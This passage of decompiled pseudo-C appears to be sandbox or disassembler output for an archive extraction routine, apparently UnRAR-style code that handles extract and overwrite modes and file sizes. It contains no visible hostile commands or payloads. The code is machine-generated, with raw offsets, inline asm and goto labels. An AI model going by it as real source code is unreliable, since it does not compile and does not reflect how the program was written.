									 *((char*)(_t697 + 0x67)) =  *((intOrPtr*)(_t582 + 0x3331));
									 *((char*)(_t697 + 0x68)) = 0;
									asm("sbb eax, [ebx+0x32f4]");
									 *0xcf3278( *((intOrPtr*)(_t582 + 0x6cc0)) -  *(_t582 + 0x32f0),  *((intOrPtr*)(_t582 + 0x6cc4)), 0);
									 *((intOrPtr*)( *_t582 + 0x10))();
									_t685 = 0;
									_t398 = 0;
									_t595 = 0;
									 *(_t721 - 0xd) = 0;
									 *(_t721 - 0x28) = 0;
									__eflags =  *(_t582 + 0x3333);
									if( *(_t582 + 0x3333) == 0) {
										L44:
										__eflags =  *(_t721 - 0x11) - _t595;
										if( *(_t721 - 0x11) != _t595) {
											L47:
											_t707 =  *(_t721 - 0x18);
											_t596 =  *((intOrPtr*)( *(_t697 + 8) + 0x7201));
											_t400 = 0x49;
											__eflags = _t596;
											if(_t596 == 0) {
												L49:
												_t401 = _t685;
												L50:
												__eflags = _t596;
												_t88 = _t721 - 0x30b8; // -10424
												_t405 = L00CD1B7F(_t596, _t88, (_t401 & 0xffffff00 | _t596 == 0x00000000) & 0x000000ff, _t401,  *(_t721 - 0x28)); // executed
												__eflags = _t405;
												if(__eflags == 0) {
													L14:
													_t406 = 0;
													__eflags = 0;
													L15:
													 *[fs:0x0] =  *((intOrPtr*)(_t721 - 0xc));
													return _t406;
												}
												_push(0x800);
												_t407 = _t697 + 0x1100;
												_push(_t407);
												 *((intOrPtr*)(_t721 - 0x38)) = _t407;
												_t91 = _t721 - 0x30b8; // -10424
												_push(_t582);
												E00CC8167(__eflags);
												__eflags =  *(_t721 - 0xd);
												if( *(_t721 - 0xd) != 0) {
													L54:
													 *(_t721 - 0xe) = 0;
													L55:
													_t411 =  *(_t697 + 8);
													_t599 = 0x45;
													__eflags =  *((char*)(_t411 + 0x715b));
													_t686 = 0x58;
													 *((intOrPtr*)(_t721 - 0x34)) = _t599;
													 *((intOrPtr*)(_t721 - 0x30)) = _t686;
													if( *((char*)(_t411 + 0x715b)) != 0) {
														L57:
														__eflags = _t707 - _t599;
														if(_t707 == _t599) {
															L59:
															_t102 = _t721 - 0x20b8; // -6328
															E00CC6EDB(_t102);
															_push(0);
															_t103 = _t721 - 0x20b8; // -6328
															_t416 = E00CCA56D(_t102, __eflags, _t697 + 0x1100, _t103);
															__eflags = _t416;
															if(_t416 == 0) {
																_t417 =  *(_t697 + 8);
																__eflags =  *((char*)(_t417 + 0x715b));
																_t114 = _t721 - 0xe;
																 *_t114 =  *(_t721 - 0xe) & (_t417 & 0xffffff00 |  *((char*)(_t417 + 0x715b)) != 0x00000000) - 0x00000001;
																__eflags =  *_t114;
																L65:
																_t116 = _t721 - 0x30b8; // -10424
																_t421 = E00CC7C0D(_t582, _t116);
																__eflags = _t421;
																if(_t421 != 0) {
																	while(1) {
																		__eflags =  *(_t582 + 0x3333);
																		if( *(_t582 + 0x3333) == 0) {
																			goto L69;
																		}
																		_t121 = _t721 - 0x30b8; // -10424
																		_t552 = E00CC8117(_t697, _t582, _t121);
																		__eflags = _t552;
																		if(_t552 == 0) {
																			 *((char*)(_t697 + 0x2100)) = 1;
																			goto L14;
																		}
																		L69:
																		_t123 = _t721 - 0x1174; // -2420
																		_t602 = 0x40;
																		memcpy(_t123,  *(_t697 + 8) + 0x6024, _t602 << 2);
																		_t725 = _t723 + 0xc;
																		asm("movsw");
																		_t125 = _t721 - 0x2c; // 0x7d4
																		 *(_t721 - 4) = 0;
																		asm("sbb ecx, ecx");
																		_t132 = _t721 - 0x1174; // -2420
																		E00CCD051( *(_t721 - 0x20), 0,  *((intOrPtr*)(_t582 + 0x3334)), _t132,  ~( *(_t582 + 0x3338) & 0x000000ff) & _t582 + 0x00003339, _t582 + 0x3349,  *((intOrPtr*)(_t582 + 0x3384)), _t582 + 0x3363, _t125);
																		__eflags =  *(_t582 + 0x3333);
																		if( *(_t582 + 0x3333) == 0) {
																			L77:
																			_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																			L78:
																			 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																			_t153 = _t721 - 0x1174; // -2420
																			L00CCF204(_t153);
																			_t154 = _t721 - 0x1070; // -2160
																			E00CC9556(_t154);
																			_t611 =  *(_t582 + 0x3398);
																			_t431 = 1;
																			 *(_t721 - 0x20) = _t611;
																			 *(_t721 - 4) = 1;
																			_t688 = 0x50;
																			__eflags = _t611;
																			if(_t611 == 0) {
																				L88:
																				_t432 = E00CC2209(_t582);
																				__eflags = _t432;
																				if(_t432 == 0) {
																					_t613 =  *(_t721 - 0xe);
																					__eflags = _t613;
																					if(_t613 == 0) {
																						L98:
																						_t431 = 1;
																						__eflags = 1;
																						L99:
																						__eflags =  *(_t582 + 0x6ccc);
																						if(__eflags == 0) {
																							__eflags = _t613;
																							if(_t613 == 0) {
																								L218:
																								 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																								_t368 = _t721 - 0x1070; // -2160
																								_t398 = E00CC959A(_t368);
																								__eflags =  *(_t721 - 0x11);
																								_t595 =  *(_t721 - 0xe);
																								_t689 =  *(_t721 - 0xd);
																								if( *(_t721 - 0x11) != 0) {
																									_t372 = _t697 + 0xf4;
																									 *_t372 =  *(_t697 + 0xf4) + 1;
																									__eflags =  *_t372;
																								}
																								L220:
																								__eflags =  *((char*)(_t697 + 0x68));
																								if( *((char*)(_t697 + 0x68)) != 0) {
																									goto L14;
																								}
																								__eflags = _t595;
																								if(_t595 != 0) {
																									L17:
																									_t406 = 1;
																									goto L15;
																								}
																								__eflags =  *(_t582 + 0x6ccc) - _t595;
																								if( *(_t582 + 0x6ccc) == _t595) {
																									L9:
																									E00CC1F47(_t582);
																									goto L17;
																								}
																								__eflags = _t689;
																								_t406 = _t398 & 0xffffff00 | _t689 != 0x00000000;
																								goto L15;
																							}
																							L104:
																							_t616 =  *(_t721 - 0x18);
																							L105:
																							_t435 =  *(_t697 + 8);
																							__eflags =  *((char*)(_t435 + 0x7201));
																							if( *((char*)(_t435 + 0x7201)) == 0) {
																								L107:
																								_t436 =  *(_t721 - 0xd);
																								__eflags = _t436;
																								if(_t436 != 0) {
																									L112:
																									 *((char*)(_t721 - 0x12)) = 1;
																									__eflags = _t436;
																									if(_t436 != 0) {
																										L114:
																										 *((intOrPtr*)(_t697 + 0xf0)) =  *((intOrPtr*)(_t697 + 0xf0)) + 1;
																										 *((intOrPtr*)(_t697 + 0x80)) = 0;
																										 *((intOrPtr*)(_t697 + 0x84)) = 0;
																										 *((intOrPtr*)(_t697 + 0x88)) = 0;
																										 *((intOrPtr*)(_t697 + 0x8c)) = 0;
																										E00CCAB1A(_t697 + 0xd0, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
																										E00CCAB1A(_t697 + 0xa8, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
																										_t442 =  *(_t582 + 0x32f0);
																										_t712 = _t697 + 0x10;
																										_t619 =  *(_t582 + 0x32f4);
																										 *(_t697 + 0x38) = _t442;
																										 *(_t697 + 0x30) = _t442;
																										_t222 = _t721 - 0x1070; // -2160
																										 *(_t697 + 0x3c) = _t619;
																										 *(_t697 + 0x34) = _t619;
																										E00CCD099(_t712, _t582, _t222);
																										_t621 =  *((intOrPtr*)(_t721 - 0x12));
																										_t690 = 0;
																										_t445 =  *(_t721 - 0xd);
																										 *((char*)(_t697 + 0x41)) = _t621;
																										 *((char*)(_t697 + 0x42)) = _t445;
																										 *(_t721 - 0x28) = 0;
																										 *(_t721 - 0x24) = 0;
																										__eflags = _t621;
																										if(_t621 != 0) {
																											L132:
																											_t622 =  *(_t697 + 8);
																											__eflags =  *((char*)(_t622 + 0x71a0));
																											 *((char*)(_t721 - 0x1053)) =  *((char*)(_t622 + 0x71a0)) == 0;
																											__eflags =  *((char*)(_t721 - 0x12));
																											if( *((char*)(_t721 - 0x12)) != 0) {
																												L136:
																												_t446 = _t690;
																												 *((char*)(_t721 - 0x10)) = _t690;
																												L137:
																												__eflags =  *(_t721 - 0x20);
																												 *((char*)(_t721 - 0x14)) = 1;
																												 *((char*)(_t721 - 0xf)) = 1;
																												if( *(_t721 - 0x20) == 0) {
																													__eflags =  *(_t582 + 0x3330);
																													if( *(_t582 + 0x3330) == 0) {
																														__eflags =  *((char*)(_t582 + 0x22b8));
																														if(__eflags != 0) {
																															_push( *(_t582 + 0x3388) & 0x000000ff);
																															_push( *((intOrPtr*)(_t582 + 0x338c)));
																															E00CD3377(_t582,  *((intOrPtr*)(_t697 + 0xe8)));
																															_t485 =  *((intOrPtr*)(_t697 + 0xe8));
																															 *(_t485 + 0x4c48) =  *(_t582 + 0x32f8);
																															__eflags = 0;
																															 *(_t485 + 0x4c4c) =  *(_t582 + 0x32fc);
																															 *((char*)(_t485 + 0x4c60)) = 0;
																															E00CD3020( *((intOrPtr*)(_t697 + 0xe8)),  *((intOrPtr*)(_t582 + 0x22b4)),  *(_t582 + 0x3388) & 0x000000ff); // executed
																														} else {
																															_push( *(_t582 + 0x32fc));
																															_push( *(_t582 + 0x32f8));
																															_push(_t712);
																															E00CC9215(_t582, _t697, __eflags);
																														}
																													}
																													L169:
																													E00CC1F47(_t582);
																													__eflags =  *((char*)(_t582 + 0x3331));
																													if( *((char*)(_t582 + 0x3331)) != 0) {
																														L172:
																														_t448 = 0;
																														__eflags = 0;
																														_t624 = 0;
																														L173:
																														__eflags =  *(_t582 + 0x3388);
																														if( *(_t582 + 0x3388) != 0) {
																															__eflags =  *((char*)(_t582 + 0x22b8));
																															if( *((char*)(_t582 + 0x22b8)) == 0) {
																																L181:
																																__eflags =  *(_t721 - 0xd);
																																 *((char*)(_t721 - 0x10)) = _t448;
																																if( *(_t721 - 0xd) != 0) {
																																	L191:
																																	__eflags =  *(_t721 - 0x20);
																																	_t691 =  *((intOrPtr*)(_t721 - 0xf));
																																	if( *(_t721 - 0x20) == 0) {
																																		L195:
																																		_t625 = 0;
																																		__eflags = 0;
																																		L196:
																																		__eflags =  *((char*)(_t721 - 0x12));
																																		if( *((char*)(_t721 - 0x12)) != 0) {
																																			goto L218;
																																		}
																																		_t713 =  *(_t721 - 0x18);
																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x30));
																																		if(_t713 ==  *((intOrPtr*)(_t721 - 0x30))) {
																																			L199:
																																			__eflags =  *(_t721 - 0x20);
																																			if( *(_t721 - 0x20) == 0) {
																																				L203:
																																				__eflags = _t448;
																																				if(_t448 == 0) {
																																					L206:
																																					__eflags = _t625;
																																					if(_t625 != 0) {
																																						L214:
																																						_t449 =  *(_t697 + 8);
																																						__eflags =  *((char*)(_t449 + 0x71a8));
																																						if( *((char*)(_t449 + 0x71a8)) == 0) {
																																							_t714 = _t697 + 0x1100;
																																							_t450 = E00CCA4ED(_t697 + 0x1100,  *((intOrPtr*)(_t582 + 0x22bc))); // executed
																																							__eflags = _t450;
																																							if(__eflags == 0) {
																																								E00CC2021(__eflags, 0x11, _t582 + 0x32, _t714);
																																								E00CC6DCB(0xd01098, __eflags);
																																							}
																																						}
																																						 *(_t697 + 0x10ff) = 1;
																																						goto L218;
																																					}
																																					_t692 =  *(_t721 - 0x24);
																																					__eflags = _t692;
																																					_t628 =  *(_t721 - 0x28);
																																					if(_t692 > 0) {
																																						L209:
																																						__eflags = _t448;
																																						if(_t448 != 0) {
																																							L212:
																																							_t341 = _t721 - 0x1070; // -2160
																																							E00CC9F09(_t341);
																																							L213:
																																							_t702 = _t582 + 0x32d8;
																																							asm("sbb eax, eax");
																																							asm("sbb ecx, ecx");
																																							asm("sbb eax, eax");
																																							_t349 = _t721 - 0x1070; // -2160
																																							E00CC9DA2(_t349, _t582 + 0x32e8,  ~( *( *(_t697 + 8) + 0x82d0)) & _t702,  ~( *( *(_t697 + 8) + 0x82d4)) & _t582 + 0x000032e0,  ~( *( *(_t697 + 8) + 0x82d8)) & _t582 + 0x000032e8);
																																							_t350 = _t721 - 0x1070; // -2160
																																							E00CC9620(_t350);
																																							E00CC7A78( *((intOrPtr*)(_t721 - 0x1c)),  *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)), _t582,  *((intOrPtr*)(_t721 - 0x38)));
																																							asm("sbb eax, eax");
																																							asm("sbb eax, eax");
																																							__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702;
																																							E00CC9D9F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d8)) & _t582 + 0x000032e8);
																																							_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																																							goto L214;
																																						}
																																						__eflags =  *((intOrPtr*)(_t697 + 0x88)) - _t628;
																																						if( *((intOrPtr*)(_t697 + 0x88)) != _t628) {
																																							goto L212;
																																						}
																																						__eflags =  *((intOrPtr*)(_t697 + 0x8c)) - _t692;
																																						if( *((intOrPtr*)(_t697 + 0x8c)) == _t692) {
																																							goto L213;
																																						}
																																						goto L212;
																																					}
																																					__eflags = _t628;
																																					if(_t628 == 0) {
																																						goto L213;
																																					}
																																					goto L209;
																																				}
																																				_t473 =  *(_t697 + 8);
																																				__eflags =  *((char*)(_t473 + 0x71a0));
																																				if( *((char*)(_t473 + 0x71a0)) == 0) {
																																					goto L218;
																																				}
																																				_t448 =  *((intOrPtr*)(_t721 - 0x10));
																																				goto L206;
																																			}
																																			__eflags = _t625;
																																			if(_t625 != 0) {
																																				goto L203;
																																			}
																																			__eflags =  *(_t582 + 0x3398) - 5;
																																			if( *(_t582 + 0x3398) != 5) {
																																				goto L218;
																																			}
																																			__eflags = _t691;
																																			if(_t691 == 0) {
																																				goto L218;
																																			}
																																			goto L203;
																																		}
																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x34));
																																		if(_t713 !=  *((intOrPtr*)(_t721 - 0x34))) {
																																			goto L218;
																																		}
																																		goto L199;
																																	}
																																	__eflags =  *(_t582 + 0x3398) - 4;
																																	if( *(_t582 + 0x3398) != 4) {
																																		goto L195;
																																	}
																																	__eflags = _t691;
																																	if(_t691 == 0) {
																																		goto L195;
																																	}
																																	_t625 = 1;
																																	goto L196;
																																}
																																__eflags =  *((char*)(_t721 - 0x14));
																																if( *((char*)(_t721 - 0x14)) == 0) {
																																	goto L191;
																																}
																																__eflags = _t624;
																																if(_t624 != 0) {
																																	goto L191;
																																}
																																__eflags =  *(_t582 + 0x3333) - _t624;
																																if(__eflags == 0) {
																																	L189:
																																	_push(3);
																																	L190:
																																	_pop(_t637);
																																	_t321 = _t721 - 0x30b8; // -10424
																																	E00CC2021(__eflags, _t637, _t582 + 0x32, _t321);
																																	 *((char*)(_t721 - 0x10)) = 1;
																																	E00CC6D83(0xd01098, 3);
																																	_t448 =  *((intOrPtr*)(_t721 - 0x10));
																																	goto L191;
																																}
																																__eflags =  *((intOrPtr*)(_t582 + 0x3359)) - _t624;
																																if( *((intOrPtr*)(_t582 + 0x3359)) == _t624) {
																																	L187:
																																	__eflags =  *((char*)(_t697 + 0xfc));
																																	if(__eflags != 0) {
																																		goto L189;
																																	}
																																	_push(4);
																																	goto L190;
																																}
																																__eflags =  *(_t582 + 0x6cdc) - _t624;
																																if(__eflags == 0) {
																																	goto L189;
																																}
																																goto L187;
																															}
																															__eflags =  *(_t582 + 0x32fc) - _t448;
																															if(__eflags < 0) {
																																goto L181;
																															}
																															if(__eflags > 0) {
																																L179:
																																__eflags = _t624;
																																if(_t624 != 0) {
																																	 *((char*)(_t697 + 0xfc)) = 1;
																																}
																																goto L181;
																															}
																															__eflags =  *(_t582 + 0x32f8) - _t448;
																															if( *(_t582 + 0x32f8) <= _t448) {
																																goto L181;
																															}
																															goto L179;
																														}
																														 *((char*)(_t697 + 0xfc)) = _t448;
																														goto L181;
																													}
																													asm("sbb eax, eax");
																													_t482 = E00CCAAEA(_t582, _t697 + 0xd0, _t582 + 0x3308,  ~( *(_t582 + 0x3362) & 0x000000ff) & _t582 + 0x00003363);
																													__eflags = _t482;
																													if(_t482 == 0) {
																														goto L172;
																													}
																													_t624 = 1;
																													_t448 = 0;
																													goto L173;
																												}
																												_t716 =  *(_t582 + 0x3398);
																												__eflags = _t716 - 4;
																												if(_t716 == 4) {
																													L151:
																													_push(0x800);
																													_t270 = _t721 - 0x50b8; // -18616
																													_push(_t582 + 0x339c);
																													E00CCB76C(_t582);
																													_push(0x800);
																													_t272 = _t721 - 0x40b8; // -14520
																													_t645 = _t697;
																													_t273 = _t721 - 0x50b8; // -18616
																													_push(_t582);
																													E00CC8167(__eflags);
																													_t446 =  *((intOrPtr*)(_t721 - 0x10));
																													__eflags = _t446;
																													if(_t446 == 0) {
																														L159:
																														_t646 =  *((intOrPtr*)(_t721 - 0xf));
																														L160:
																														__eflags =  *((intOrPtr*)(_t582 + 0x6cc8)) - 2;
																														if( *((intOrPtr*)(_t582 + 0x6cc8)) != 2) {
																															L146:
																															__eflags = _t446;
																															if(_t446 == 0) {
																																L163:
																																_t495 = 0;
																																__eflags = 0;
																																L164:
																																 *(_t697 + 0x10ff) = _t495;
																																goto L169;
																															}
																															L147:
																															__eflags = _t646;
																															if(_t646 == 0) {
																																goto L163;
																															}
																															_t495 = 1;
																															goto L164;
																														}
																														__eflags = _t446;
																														if(_t446 != 0) {
																															goto L147;
																														}
																														L145:
																														 *((char*)(_t721 - 0x14)) = 0;
																														goto L146;
																													}
																													__eflags =  *((short*)(_t721 - 0x40b8));
																													if( *((short*)(_t721 - 0x40b8)) == 0) {
																														goto L159;
																													}
																													_t276 = _t721 - 0x40b8; // -14520
																													_push(0x800);
																													_push(_t697 + 0x1100);
																													__eflags = _t716 - 4;
																													if(__eflags != 0) {
																														_push(_t582 + 0x32);
																														_t281 = _t721 - 0x1070; // -2160
																														_t500 = E00CC9155(_t690, _t697, _t716, __eflags);
																														_t646 = _t500;
																														 *((char*)(_t721 - 0xf)) = _t500;
																														L157:
																														__eflags = _t646;
																														if(_t646 == 0) {
																															L144:
																															_t446 =  *((intOrPtr*)(_t721 - 0x10));
																															goto L145;
																														}
																														_t446 =  *((intOrPtr*)(_t721 - 0x10));
																														goto L160;
																													}
																													_push( *(_t697 + 8));
																													_t501 = E00CC7542(_t645, _t697, __eflags);
																													L155:
																													_t646 = _t501;
																													 *((char*)(_t721 - 0xf)) = _t646;
																													goto L157;
																												}
																												__eflags = _t716 - 5;
																												if(_t716 == 5) {
																													goto L151;
																												}
																												__eflags = _t716 - 1;
																												if(_t716 == 1) {
																													L149:
																													__eflags = _t446;
																													if(_t446 == 0) {
																														goto L159;
																													}
																													_push(_t697 + 0x1100);
																													_t501 = E00CC77B8(_t622, _t697 + 0x10, _t582);
																													goto L155;
																												}
																												__eflags = _t716 - 2;
																												if(_t716 == 2) {
																													goto L149;
																												}
																												__eflags = _t716 - 3;
																												if(__eflags == 0) {
																													goto L149;
																												}
																												E00CC2021(__eflags, 0x47, _t582 + 0x32, _t697 + 0x1100);
																												__eflags = 0;
																												_t646 = 0;
																												 *((char*)(_t721 - 0xf)) = 0;
																												goto L144;
																											}
																											__eflags = _t445;
																											if(_t445 != 0) {
																												goto L136;
																											}
																											_t508 = 0x50;
																											__eflags =  *(_t721 - 0x18) - _t508;
																											if( *(_t721 - 0x18) == _t508) {
																												goto L136;
																											}
																											_t446 = 1;
																											 *((char*)(_t721 - 0x10)) = 1;
																											goto L137;
																										}
																										__eflags =  *(_t582 + 0x6cdc);
																										if( *(_t582 + 0x6cdc) != 0) {
																											goto L132;
																										}
																										_t717 =  *(_t582 + 0x32fc);
																										_t695 =  *(_t582 + 0x32f8);
																										__eflags = _t717;
																										if(__eflags < 0) {
																											L131:
																											_t690 = 0;
																											__eflags = 0;
																											_t712 = _t697 + 0x10;
																											goto L132;
																										}
																										if(__eflags > 0) {
																											L119:
																											_t649 =  *(_t582 + 0x32f0);
																											_t650 = _t649 << 0xa;
																											__eflags = ( *(_t582 + 0x32f4) << 0x00000020 | _t649) << 0xa - _t717;
																											if(__eflags < 0) {
																												L130:
																												_t445 =  *(_t721 - 0xd);
																												goto L131;
																											}
																											if(__eflags > 0) {
																												L122:
																												__eflags =  *((intOrPtr*)(_t582 + 0x10)) - 1;
																												if( *((intOrPtr*)(_t582 + 0x10)) == 1) {
																													goto L130;
																												}
																												__eflags = _t717;
																												if(__eflags < 0) {
																													L129:
																													_t244 = _t721 - 0x1070; // -2160
																													E00CC9A3C(_t244,  *(_t582 + 0x32f8),  *(_t582 + 0x32fc));
																													 *(_t721 - 0x28) =  *(_t582 + 0x32f8);
																													 *(_t721 - 0x24) =  *(_t582 + 0x32fc);
																													goto L130;
																												}
																												if(__eflags > 0) {
																													L126:
																													_t515 = E00CC981A(_t695);
																													__eflags = _t695 -  *(_t582 + 0x32f4);
																													if(__eflags < 0) {
																														goto L130;
																													}
																													if(__eflags > 0) {
																														goto L129;
																													}
																													__eflags = _t515 -  *(_t582 + 0x32f0);
																													if(_t515 <=  *(_t582 + 0x32f0)) {
																														goto L130;
																													}
																													goto L129;
																												}
																												__eflags = _t695 - 0x5f5e100;
																												if(_t695 < 0x5f5e100) {
																													goto L129;
																												}
																												goto L126;
																											}
																											__eflags = _t650 - _t695;
																											if(_t650 <= _t695) {
																												goto L130;
																											}
																											goto L122;
																										}
																										__eflags = _t695 - 0xf4240;
																										if(_t695 <= 0xf4240) {
																											goto L131;
																										}
																										goto L119;
																									}
																									L113:
																									_t202 = _t697 + 0xec;
																									 *_t202 =  *(_t697 + 0xec) + 1;
																									__eflags =  *_t202;
																									goto L114;
																								}
																								 *((char*)(_t721 - 0x12)) = 0;
																								_t517 = 0x50;
																								__eflags = _t616 - _t517;
																								if(_t616 != _t517) {
																									_t196 = _t721 - 0x1070; // -2160
																									__eflags = E00CC98BC(_t196);
																									if(__eflags != 0) {
																										E00CC2021(__eflags, 0x3b, _t582 + 0x32, _t697 + 0x1100);
																										E00CC6E98(0xd01098, _t721, _t582 + 0x32, _t697 + 0x1100);
																									}
																								}
																								goto L113;
																							}
																							 *(_t697 + 0x10ff) = 1;
																							__eflags =  *((char*)(_t435 + 0x7201));
																							if( *((char*)(_t435 + 0x7201)) != 0) {
																								_t436 =  *(_t721 - 0xd);
																								goto L112;
																							}
																							goto L107;
																						}
																						 *(_t721 - 0xd) = _t431;
																						 *(_t721 - 0xe) = _t431;
																						_t185 = _t721 - 0x30b8; // -10424
																						_t525 = L00CD1B7F(__eflags, _t185, 0, 0, _t431);
																						__eflags = _t525;
																						if(_t525 != 0) {
																							goto L104;
																						}
																						__eflags = 0;
																						 *(_t721 - 0x24) = 0;
																						L102:
																						_t187 = _t721 - 0x1070; // -2160
																						E00CC959A(_t187);
																						_t406 =  *(_t721 - 0x24);
																						goto L15;
																					}
																					_t180 = _t721 - 0x1070; // -2160
																					_push(_t582);
																					_t529 = E00CC7FC0(_t697);
																					_t613 = _t529;
																					 *(_t721 - 0xe) = _t529;
																					L97:
																					__eflags = _t613;
																					if(_t613 != 0) {
																						goto L104;
																					}
																					goto L98;
																				}
																				__eflags =  *(_t721 - 0xe);
																				if( *(_t721 - 0xe) != 0) {
																					_t530 =  *(_t721 - 0x18);
																					__eflags = _t530 - 0x50;
																					if(_t530 != 0x50) {
																						_t657 = 0x49;
																						__eflags = _t530 - _t657;
																						if(_t530 != _t657) {
																							_t658 = 0x45;
																							__eflags = _t530 - _t658;
																							if(_t530 != _t658) {
																								_t531 =  *(_t697 + 8);
																								__eflags =  *((intOrPtr*)(_t531 + 0x7160)) - 1;
																								if( *((intOrPtr*)(_t531 + 0x7160)) != 1) {
																									 *(_t697 + 0xec) =  *(_t697 + 0xec) + 1;
																									_t178 = _t721 - 0x30b8; // -10424
																									_push(_t582);
																									E00CC7DB2(_t697);
																								}
																							}
																						}
																					}
																				}
																				goto L102;
																			}
																			__eflags = _t611 - 5;
																			if(_t611 == 5) {
																				goto L88;
																			}
																			_t613 =  *(_t721 - 0xe);
																			__eflags = _t613;
																			if(_t613 == 0) {
																				goto L99;
																			}
																			_t616 =  *(_t721 - 0x18);
																			__eflags = _t616 - _t688;
																			if(_t616 == _t688) {
																				goto L105;
																			}
																			_t534 =  *(_t697 + 8);
																			__eflags =  *((char*)(_t534 + 0x7201));
																			if( *((char*)(_t534 + 0x7201)) != 0) {
																				goto L105;
																			}
																			_t719 = _t697 + 0x1100;
																			 *((char*)(_t721 - 0x12)) = 0;
																			_t536 = E00CCA231(_t719);
																			__eflags = _t536;
																			if(_t536 == 0) {
																				L86:
																				__eflags =  *((char*)(_t721 - 0x12));
																				if( *((char*)(_t721 - 0x12)) == 0) {
																					goto L104;
																				}
																				L87:
																				_t613 = 0;
																				 *(_t721 - 0xe) = 0;
																				goto L97;
																			}
																			__eflags =  *((char*)(_t721 - 0x12));
																			if( *((char*)(_t721 - 0x12)) != 0) {
																				goto L87;
																			}
																			__eflags = 0;
																			_push(0);
																			_push(_t582 + 0x32d8);
																			_push( *(_t582 + 0x32fc));
																			_t167 = _t721 - 0x12; // 0x7ee
																			_push( *(_t582 + 0x32f8));
																			_push(0x800);
																			_push(_t719);
																			_push(0);
																			_push( *(_t697 + 8));
																			E00CC92A3();
																			goto L86;
																		}
																		__eflags =  *((char*)(_t582 + 0x3359));
																		if( *((char*)(_t582 + 0x3359)) == 0) {
																			goto L77;
																		}
																		_t137 = _t721 - 0x2c; // 0x7d4
																		_t543 = E00CE0C4A(_t582 + 0x335a, _t137, 8);
																		_t723 = _t725 + 0xc;
																		__eflags = _t543;
																		if(_t543 == 0) {
																			goto L77;
																		}
																		__eflags =  *(_t582 + 0x6cdc);
																		_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																		if( *(_t582 + 0x6cdc) != 0) {
																			goto L78;
																		}
																		__eflags =  *((char*)(_t697 + 0x10fe));
																		_t142 = _t721 - 0x30b8; // -10424
																		_push(_t582 + 0x32);
																		if(__eflags != 0) {
																			_push(6);
																			E00CC2021(__eflags);
																			E00CC6D83(0xd01098, 0xb);
																			 *(_t721 - 0xe) = 0;
																			goto L78;
																		}
																		_push(0x83);
																		E00CC2021(__eflags);
																		E00CCF279( *(_t697 + 8) + 0x6024);
																		 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																		_t147 = _t721 - 0x1174; // -2420
																		L00CCF204(_t147);
																	}
																}
																E00CC6D83(0xd01098, 2);
																_t554 = E00CC1F47(_t582);
																__eflags =  *(_t582 + 0x6ccc);
																_t406 = _t554 & 0xffffff00 |  *(_t582 + 0x6ccc) == 0x00000000;
																goto L15;
															}
															_t106 = _t721 - 0x10a8; // -2216
															_t556 = E00CC7BE7(_t106, _t582 + 0x32d8);
															__eflags = _t556;
															if(_t556 == 0) {
																goto L65;
															}
															__eflags =  *((char*)(_t721 - 0x10ac));
															if( *((char*)(_t721 - 0x10ac)) == 0) {
																L63:
																 *(_t721 - 0xe) = 0;
																goto L65;
															}
															_t108 = _t721 - 0x10a8; // -2216
															_t558 = E00CC7BCA(_t108, _t697);
															__eflags = _t558;
															if(_t558 == 0) {
																goto L65;
															}
															goto L63;
														}
														__eflags = _t707 - _t686;
														if(_t707 != _t686) {
															goto L65;
														}
														goto L59;
													}
													__eflags =  *((char*)(_t411 + 0x715c));
													if( *((char*)(_t411 + 0x715c)) == 0) {
														goto L65;
													}
													goto L57;
												}
												__eflags =  *(_t697 + 0x1100);
												if( *(_t697 + 0x1100) == 0) {
													goto L54;
												}
												 *(_t721 - 0xe) = 1;
												__eflags =  *(_t582 + 0x3330);
												if( *(_t582 + 0x3330) == 0) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t707 - _t400;
											_t401 = 1;
											if(_t707 != _t400) {
												goto L50;
											}
											goto L49;
										}
										L45:
										_t689 =  *(_t582 + 0x6ccc);
										 *(_t721 - 0xd) = _t689;
										 *(_t721 - 0x28) = _t689;
										__eflags = _t689;
										if(_t689 == 0) {
											goto L220;
										}
										_t685 = 0;
										__eflags = 0;
										goto L47;
									}
									_t398 =  *(_t697 + 8);
									__eflags =  *(_t398 + 0x6127);
									if( *(_t398 + 0x6127) == 0) {
										goto L44;
									}
									__eflags =  *(_t582 + 0x6ccc);
									if( *(_t582 + 0x6ccc) != 0) {
										goto L14;
									}
									 *(_t721 - 0x11) = 0;
									goto L45;
								}
								__eflags =  *(_t697 + 0xf4) -  *((intOrPtr*)(_t586 + 0xb334));
								if( *(_t697 + 0xf4) <  *((intOrPtr*)(_t586 + 0xb334))) {
									goto L29;
								}
								__eflags =  *((char*)(_t697 + 0xf9));
								if( *((char*)(_t697 + 0xf9)) != 0) {
									goto L14;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t582 + 0x32f8) = _t684;
								 *(_t582 + 0x32fc) = _t684;
								goto L26;
							}
							__eflags =  *(_t582 + 0x32f8) - _t684;
							if( *(_t582 + 0x32f8) >= _t684) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t582 + 0x32f0) = _t684;
							 *(_t582 + 0x32f4) = _t684;
							goto L22;
						}
						__eflags =  *(_t582 + 0x32f0) - _t684;
						if( *(_t582 + 0x32f0) >= _t684) {
							goto L22;
						}
						goto L21;
					}
					if(_t383 != 3) {
						__eflags = _t383 - 5;
						if(_t383 != 5) {
							goto L9;
						}
						__eflags =  *((char*)(_t582 + 0x45c4));
						if( *((char*)(_t582 + 0x45c4)) == 0) {
							goto L14;
						}
						_push(_t585);
						_push(_t684);
